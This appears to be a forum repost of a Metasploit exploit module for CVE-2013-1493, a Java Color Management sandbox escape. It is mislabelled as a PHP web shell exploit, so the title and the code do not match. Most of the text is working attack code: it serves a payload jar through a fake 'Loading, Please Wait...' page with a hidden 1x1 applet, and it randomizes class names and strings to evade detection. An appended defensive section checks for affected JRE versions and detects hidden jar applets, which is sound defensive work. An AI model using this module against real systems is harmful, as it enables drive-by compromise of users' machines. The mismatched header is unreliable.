STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework and
  # randomize the name of the entry class.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Serve the jar for *.jar requests, the applet page for the resource
  # root, and redirect anything else to the root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the well-known "metasploit"/"Payload" strings inside the jar
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Minimal page embedding a 1x1 applet that pulls the randomly named jar
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
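Two defender-side checks derived from the module above, added here as an example and not part of the forum post or the Metasploit module: one tests whether a JRE build falls in the range the module's description lists as affected (7u15 and earlier, 6u41 and earlier), the other flags an HTML body carrying a 1x1 applet that loads a .jar, which is the shape of the page generate_html produces. Version strings are assumed to look like "1.7.0_15" or "7u15"; the two sample pages are constructed.

```ruby
# Added example, not the module's own code.

# Highest update level still affected, per the module description
# (assumption: major.minor/"7u" forms are the only inputs we see).
AFFECTED_MAX_UPDATE = { 6 => 41, 7 => 15 }.freeze

# Parse "1.7.0_15" or "7u15" into [major, update]; nil if unrecognized.
def parse_java_version(str)
  if (m = str.match(/\A1\.(\d)\.0_(\d+)\z/))
    [m[1].to_i, m[2].to_i]
  elsif (m = str.match(/\A(\d)u(\d+)\z/))
    [m[1].to_i, m[2].to_i]
  end
end

# True when the build is at or below the last affected update.
def affected_java_version?(str)
  major, update = parse_java_version(str)
  return false if major.nil?
  limit = AFFECTED_MAX_UPDATE[major]
  !limit.nil? && update <= limit
end

APPLET_RE = /<applet\b([^>]*)>/i

# True when any <applet> in the body points at a .jar and declares a
# width and height of at most 1 pixel (the hidden-applet pattern above).
def hidden_jar_applet?(html)
  html.scan(APPLET_RE).flatten.any? do |attrs|
    archive = attrs[/archive="([^"]+)"/i, 1]
    w = attrs[/width="(\d+)"/i, 1]
    h = attrs[/height="(\d+)"/i, 1]
    !archive.nil? && archive =~ /\.jar\z/i && !w.nil? && !h.nil? &&
      w.to_i <= 1 && h.to_i <= 1
  end
end

# Constructed samples: one mimicking the generated page, one benign.
SAMPLE_EXPLOIT_PAGE = '<html><body><center><p>Loading, Please Wait...</p></center>' \
  '<applet archive="aBcDeFgH.jar" code="QwEr.class" width="1" height="1">' \
  '</applet></body></html>'
SAMPLE_BENIGN_PAGE = '<html><body><applet archive="viewer.jar" ' \
  'code="Viewer.class" width="640" height="480"></applet></body></html>'
```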